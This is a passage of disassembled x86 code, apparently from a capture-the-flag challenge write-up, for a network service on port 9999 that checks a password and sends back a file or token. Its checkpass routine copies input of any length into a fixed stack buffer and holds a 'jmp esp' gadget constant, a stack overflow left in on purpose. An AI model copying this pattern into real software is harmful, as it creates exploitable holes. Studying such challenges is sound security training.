80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="x" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"/span span class="code-line"span class="mh"0804886c/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"main/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 804886c: 55 push ebp/span/span span class="code-line"span class="x" 804886d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804886f: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048872: 81 ec 40 04 00 00 sub esp,0x440/span/span span class="code-line"span class="x" 8048878: c7 44 24 08 00 00 00 mov DWORD PTR [esp+0x8],0x0/span/span span class="code-line"span class="x" 804887f: 00 /span/span span class="code-line"span class="x" 8048880: c7 44 24 04 01 00 00 mov DWORD PTR [esp+0x4],0x1/span/span span class="code-line"span class="x" 8048887: 00 /span/span span class="code-line"span class="x" 8048888: c7 04 24 02 00 00 00 mov DWORD PTR [esp],0x2/span/span span class="code-line"span class="x" 804888f: e8 cc fe ff ff call 8048760 lt;socket@pltgt;/span/span span class="code-line"span class="x" 8048894: 89 84 24 3c 04 00 00 mov DWORD PTR [esp+0x43c],eax/span/span span class="code-line"span class="x" 804889b: c7 44 24 04 10 00 00 mov DWORD PTR [esp+0x4],0x10/span/span span class="code-line"span class="x" 80488a2: 00 /span/span span class="code-line"span class="x" 80488a3: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488aa: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80488ad: e8 8e fd ff ff call 8048640 lt;bzero@pltgt;/span/span span class="code-line"span class="x" 80488b2: 66 c7 84 24 20 04 00 mov WORD PTR [esp+0x420],0x2/span/span span class="code-line"span class="x" 80488b9: 00 02 00 /span/span span class="code-line"span class="x" 80488bc: c7 04 24 00 00 00 00 mov DWORD PTR [esp],0x0/span/span span class="code-line"span class="x" 80488c3: e8 68 fe ff ff call 8048730 lt;htonl@pltgt;/span/span span class="code-line"span class="x" 80488c8: 89 84 24 24 04 00 00 mov DWORD PTR [esp+0x424],eax/span/span span class="code-line"span class="x" 80488cf: c7 04 24 0f 27 00 00 mov DWORD PTR [esp],0x270f/span/span span class="code-line"span class="x" 80488d6: e8 a5 fd ff ff call 8048680 lt;htons@pltgt;/span/span span class="code-line"span class="x" 80488db: 66 89 84 24 22 04 00 mov WORD PTR [esp+0x422],ax/span/span span class="code-line"span class="x" 80488e2: 00 /span/span span class="code-line"span class="x" 80488e3: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 80488ea: 00 /span/span span class="code-line"span class="x" 80488eb: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488f2: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80488f6: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 80488fd: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048900: e8 eb fd ff ff call 80486f0 lt;bind@pltgt;/span/span span class="code-line"span class="x" 8048905: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 804890c: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 8048913: 00 /span/span span class="code-line"span class="x" 8048914: 74 20 je 8048936 lt;main+0xcagt;/span/span span class="code-line"span class="x" 8048916: c7 44 24 04 0f 27 00 mov DWORD PTR [esp+0x4],0x270f/span/span span class="code-line"span class="x" 804891d: 00 /span/span span class="code-line"span class="x" 804891e: c7 04 24 90 8d 04 08 mov DWORD PTR [esp],0x8048d90/span/span span class="code-line"span class="x" 8048925: e8 06 fd ff ff call 8048630 lt;printf@pltgt;/span/span span class="code-line"span class="x" 804892a: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048931: e8 8a fd ff ff call 80486c0 lt;exit@pltgt;/span/span span class="code-line"span class="x" 8048936: c7 44 24 04 00 04 00 mov DWORD PTR [esp+0x4],0x400/span/span span class="code-line"span class="x" 804893d: 00 /span/span span class="code-line"span class="x" 804893e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048945: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048948: e8 f3 fd ff ff call 8048740 lt;listen@pltgt;/span/span span class="code-line"span class="x" 804894d: c7 84 24 0c 04 00 00 mov DWORD PTR [esp+0x40c],0x10/span/span span class="code-line"span class="x" 8048954: 10 00 00 00 /span/span span class="code-line"span class="x" 8048958: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804895f: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048963: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 804896a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804896e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048975: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048978: e8 13 fd ff ff call 8048690 lt;accept@pltgt;/span/span span class="code-line"span class="x" 804897d: 89 84 24 34 04 00 00 mov DWORD PTR [esp+0x434],eax/span/span span class="code-line"span class="x" 8048984: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804898b: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 804898f: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 8048996: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 804899a: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 80489a1: 00 /span/span span class="code-line"span class="x" 80489a2: c7 44 24 08 e8 03 00 mov DWORD PTR [esp+0x8],0x3e8/span/span span class="code-line"span class="x" 80489a9: 00 /span/span span class="code-line"span class="x" 80489aa: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489ae: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80489b2: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 80489b9: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489bc: e8 9f fc ff ff call 8048660 lt;recvfrom@pltgt;/span/span span class="code-line"span class="x" 80489c1: 89 84 24 30 04 00 00 mov DWORD PTR [esp+0x430],eax/span/span span class="code-line"span class="x" 80489c8: 8d 54 24 24 lea edx,[esp+0x24]/span/span span class="code-line"span class="x" 80489cc: 8b 84 24 30 04 00 00 mov eax,DWORD PTR [esp+0x430]/span/span span class="code-line"span class="x" 80489d3: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80489d5: c6 00 00 mov BYTE PTR [eax],0x0/span/span span class="code-line"span class="x" 80489d8: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489dc: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489df: e8 a8 02 00 00 call 8048c8c lt;checkpassgt;/span/span span class="code-line"span class="x" 80489e4: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 80489eb: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 80489f2: 00 /span/span span class="code-line"span class="x" 80489f3: 0f 84 8c 00 00 00 je 8048a85 lt;main+0x219gt;/span/span span class="code-line"span class="x" 80489f9: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x5/span/span span class="code-line"span class="x" 8048a00: 05 /span/span span class="code-line"span class="x" 8048a01: 74 45 je 8048a48 lt;main+0x1dcgt;/span/span span class="code-line"span class="x" 8048a03: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048a07: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 8048a0b: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a12: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a16: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a1d: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a21: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a28: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a2c: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a33: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a37: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a3e: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a41: e8 41 01 00 00 call 8048b87 lt;senderrorgt;/span/span span class="code-line"span class="x" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a48: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a4f: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a53: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a5a: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a5e: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a65: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a69: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a70: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a74: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a7b: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a7e: e8 76 01 00 00 call 8048bf9 lt;sendtokengt;/span/span span class="code-line"span class="x" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a85: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a8c: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a90: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a97: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a9b: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048aa2: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048aa6: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048aad: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048ab1: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ab8: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048abb: e8 34 00 00 00 call 8048af4 lt;sendfilegt;/span/span span class="code-line"span class="x" 8048ac0: c7 04 24 b2 8d 04 08 mov DWORD PTR [esp],0x8048db2/span/span span class="code-line"span class="x" 8048ac7: e8 d4 fb ff ff call 80486a0 lt;puts@pltgt;/span/span span class="code-line"span class="x" 8048acc: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048ad0: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048ad4: c7 04 24 ca 8d 04 08 mov DWORD PTR [esp],0x8048dca/span/span span class="code-line"span class="x" 8048adb: e8 50 fb ff ff call 8048630 lt;printf@pltgt;/span/span span class="code-line"span class="x" 8048ae0: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ae7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048aea: e8 81 fc ff ff call 8048770 lt;close@pltgt;/span/span span class="code-line"span class="x" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048af4/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"sendfile/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048af4: 55 push ebp/span/span span class="code-line"span class="x" 8048af5: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048af7: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048afa: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048b01: 08 /span/span span class="code-line"span class="x" 8048b02: c7 04 24 cf 8d 04 08 mov DWORD PTR [esp],0x8048dcf/span/span span class="code-line"span class="x" 8048b09: e8 f2 fb ff ff call 8048700 lt;fopen@pltgt;/span/span span class="code-line"span class="x" 8048b0e: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048b11: 83 7d f4 00 cmp DWORD PTR [ebp-0xc],0x0/span/span span class="code-line"span class="x" 8048b15: 74 56 je 8048b6d lt;sendfile+0x79gt;/span/span span class="code-line"span class="x" 8048b17: eb 31 jmp 8048b4a lt;sendfile+0x56gt;/span/span span class="code-line"span class="x" 8048b19: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048b20: 00 /span/span span class="code-line"span class="x" 8048b21: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048b24: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048b28: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048b2f: 00 /span/span span class="code-line"span class="x" 8048b30: c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1/span/span span class="code-line"span class="x" 8048b37: 00 /span/span span class="code-line"span class="x" 8048b38: 8d 45 f0 lea eax,[ebp-0x10]/span/span span class="code-line"span class="x" 8048b3b: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048b3f: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048b42: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b45: e8 d6 fb ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048b4a: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048b4d: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b50: e8 1b fb ff ff call 8048670 lt;_IO_getc@pltgt;/span/span span class="code-line"span class="x" 8048b55: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048b58: 8b 45 f0 mov eax,DWORD PTR [ebp-0x10]/span/span span class="code-line"span class="x" 8048b5b: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 8048b5e: 75 b9 jne 8048b19 lt;sendfile+0x25gt;/span/span span class="code-line"span class="x" 8048b60: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048b63: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b66: e8 e5 fa ff ff call 8048650 lt;fclose@pltgt;/span/span span class="code-line"span class="x" 8048b6b: eb 18 jmp 8048b85 lt;sendfile+0x91gt;/span/span span class="code-line"span class="x" 8048b6d: c7 04 24 dc 8d 04 08 mov DWORD PTR [esp],0x8048ddc/span/span span class="code-line"span class="x" 8048b74: e8 27 fb ff ff call 80486a0 lt;puts@pltgt;/span/span span class="code-line"span class="x" 8048b79: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048b80: e8 3b fb ff ff call 80486c0 lt;exit@pltgt;/span/span span class="code-line"span class="x" 8048b85: c9 leave /span/span span class="code-line"span class="x" 8048b86: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048b87/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"senderror/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048b87: 55 push ebp/span/span span class="code-line"span class="x" 8048b88: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048b8a: 83 ec 28 sub esp,0x28/span/span span class="code-line"span class="x" 8048b8d: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048b94: 00 /span/span span class="code-line"span class="x" 8048b95: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048b98: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048b9c: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048ba3: 00 /span/span span class="code-line"span class="x" 8048ba4: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 8048bab: 00 /span/span span class="code-line"span class="x" 8048bac: c7 44 24 04 fb 8d 04 mov DWORD PTR [esp+0x4],0x8048dfb/span/span span class="code-line"span class="x" 8048bb3: 08 /span/span span class="code-line"span class="x" 8048bb4: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048bb7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bba: e8 61 fb ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048bbf: 8b 45 1c mov eax,DWORD PTR [ebp+0x1c]/span/span span class="code-line"span class="x" 8048bc2: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bc5: e8 06 fb ff ff call 80486d0 lt;strlen@pltgt;/span/span span class="code-line"span class="x" 8048bca: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048bd1: 00 /span/span span class="code-line"span class="x" 8048bd2: 8d 55 0c lea edx,[ebp+0xc]/span/span span class="code-line"span class="x" 8048bd5: 89 54 24 10 mov DWORD PTR [esp+0x10],edx/span/span span class="code-line"span class="x" 8048bd9: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048be0: 00 /span/span span class="code-line"span class="x" 8048be1: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048be5: 8b 45 1c mov eax,DWORD PTR [ebp+0x1c]/span/span span class="code-line"span class="x" 8048be8: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048bec: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048bef: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bf2: e8 29 fb ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048bf7: c9 leave /span/span span class="code-line"span class="x" 8048bf8: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048bf9/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"sendtoken/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048bf9: 55 push ebp/span/span span class="code-line"span class="x" 8048bfa: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048bfc: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048bff: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048c06: 08 /span/span span class="code-line"span class="x" 8048c07: c7 04 24 0c 8e 04 08 mov DWORD PTR [esp],0x8048e0c/span/span span class="code-line"span class="x" 8048c0e: e8 ed fa ff ff call 8048700 lt;fopen@pltgt;/span/span span class="code-line"span class="x" 8048c13: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048c16: 83 7d f4 00 cmp DWORD PTR [ebp-0xc],0x0/span/span span class="code-line"span class="x" 8048c1a: 74 56 je 8048c72 lt;sendtoken+0x79gt;/span/span span class="code-line"span class="x" 8048c1c: eb 31 jmp 8048c4f lt;sendtoken+0x56gt;/span/span span class="code-line"span class="x" 8048c1e: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048c25: 00 /span/span span class="code-line"span class="x" 8048c26: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048c29: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048c2d: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048c34: 00 /span/span span class="code-line"span class="x" 8048c35: c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1/span/span span class="code-line"span class="x" 8048c3c: 00 /span/span span class="code-line"span class="x" 8048c3d: 8d 45 f0 lea eax,[ebp-0x10]/span/span span class="code-line"span class="x" 8048c40: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048c44: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048c47: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c4a: e8 d1 fa ff ff call 8048720 lt;sendto@pltgt;/span/span span class="code-line"span class="x" 8048c4f: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048c52: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c55: e8 16 fa ff ff call 8048670 lt;_IO_getc@pltgt;/span/span span class="code-line"span class="x" 8048c5a: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048c5d: 8b 45 f0 mov eax,DWORD PTR [ebp-0x10]/span/span span class="code-line"span class="x" 8048c60: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 8048c63: 75 b9 jne 8048c1e lt;sendtoken+0x25gt;/span/span span class="code-line"span class="x" 8048c65: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048c68: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c6b: e8 e0 f9 ff ff call 8048650 lt;fclose@pltgt;/span/span span class="code-line"span class="x" 8048c70: eb 18 jmp 8048c8a lt;sendtoken+0x91gt;/span/span span class="code-line"span class="x" 8048c72: c7 04 24 12 8e 04 08 mov DWORD PTR [esp],0x8048e12/span/span span class="code-line"span class="x" 8048c79: e8 22 fa ff ff call 80486a0 lt;puts@pltgt;/span/span span class="code-line"span class="x" 8048c7e: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048c85: e8 36 fa ff ff call 80486c0 lt;exit@pltgt;/span/span span class="code-line"span class="x" 8048c8a: c9 leave /span/span span class="code-line"span class="x" 8048c8b: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048c8c/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"checkpass/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048c8c: 55 push ebp/span/span span class="code-line"span class="x" 8048c8d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048c8f: 81 ec 28 02 00 00 sub esp,0x228/span/span span class="code-line"span class="x" 8048c95: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048c98: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c9b: e8 30 fa ff ff call 80486d0 lt;strlen@pltgt;/span/span span class="code-line"span class="x" 8048ca0: 83 c0 01 add eax,0x1/span/span span class="code-line"span class="x" 8048ca3: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048ca7: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048caa: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048cae: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048cb4: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cb7: e8 54 fa ff ff call 8048710 lt;strncpy@pltgt;/span/span span class="code-line"span class="x" 8048cbc: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048cc2: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cc5: e8 86 fa ff ff call 8048750 lt;atoi@pltgt;/span/span span class="code-line"span class="x" 8048cca: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048ccd: 81 7d f0 ff e4 00 00 cmp DWORD PTR [ebp-0x10],0xe4ff/span/span span class="code-line"span class="x" 8048cd4: 75 09 jne 8048cdf lt;checkpass+0x53gt;/span/span span class="code-line"span class="x" 8048cd6: c7 45 f4 05 00 00 00 mov DWORD PTR [ebp-0xc],0x5/span/span span class="code-line"span class="x" 8048cdd: eb 19 jmp 8048cf8 lt;checkpass+0x6cgt;/span/span span class="code-line"span class="x" 8048cdf: c7 44 24 04 2c 8e 04 mov DWORD PTR [esp+0x4],0x8048e2c/span/span span class="code-line"span class="x" 8048ce6: 08 /span/span span class="code-line"span class="x" 8048ce7: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048ced: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cf0: e8 2b f9 ff ff call 8048620 lt;strcmp@pltgt;/span/span span class="code-line"span class="x" 8048cf5: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048cf8: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048cfb: c9 leave /span/span span class="code-line"span class="x" 8048cfc: c3 ret /span/span span class="code-line"span class="x" 8048cfd: 90 nop/span/span span class="code-line"span class="x" 8048cfe: 90 nop/span/span span class="code-line"span class="x" 8048cff: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"08048d00/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d00: 55 push ebp/span/span span class="code-line"span class="x" 8048d01: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d03: 5d pop ebp/span/span span class="code-line"span class="x" 8048d04: c3 ret /span/span span class="code-line"span class="x" 8048d05: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"span class="x" 8048d09: 8d bc 27 00 00 00 00 lea edi,[edi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048d10/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__libc_csu_init/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d10: 55 push ebp/span/span span class="code-line"span class="x" 8048d11: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d13: 57 push edi/span/span span class="code-line"span class="x" 8048d14: 56 push esi/span/span span class="code-line"span class="x" 8048d15: 53 push ebx/span/span span class="code-line"span class="x" 8048d16: e8 4f 00 00 00 call 8048d6a lt;__i686.get_pc_thunk.bxgt;/span/span span class="code-line"span class="x" 8048d1b: 81 c3 e5 03 00 00 add ebx,0x3e5/span/span span class="code-line"span class="x" 8048d21: 83 ec 1c sub esp,0x1c/span/span span class="code-line"span class="x" 8048d24: e8 b7 f8 ff ff call 80485e0 lt;_initgt;/span/span span class="code-line"span class="x" 8048d29: 8d bb 04 ff ff ff lea edi,[ebx-0xfc]/span/span span class="code-line"span class="x" 8048d2f: 8d 83 00 ff ff ff lea eax,[ebx-0x100]/span/span span class="code-line"span class="x" 8048d35: 29 c7 sub edi,eax/span/span span class="code-line"span class="x" 8048d37: c1 ff 02 sar edi,0x2/span/span span class="code-line"span class="x" 8048d3a: 85 ff test edi,edi/span/span span class="code-line"span class="x" 8048d3c: 74 24 je 8048d62 lt;__libc_csu_init+0x52gt;/span/span span class="code-line"span class="x" 8048d3e: 31 f6 xor esi,esi/span/span span class="code-line"span class="x" 8048d40: 8b 45 10 mov eax,DWORD PTR [ebp+0x10]/span/span span class="code-line"span class="x" 8048d43: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048d47: 8b 45 0c mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="x" 8048d4a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048d4e: 8b 45 08 mov eax,DWORD 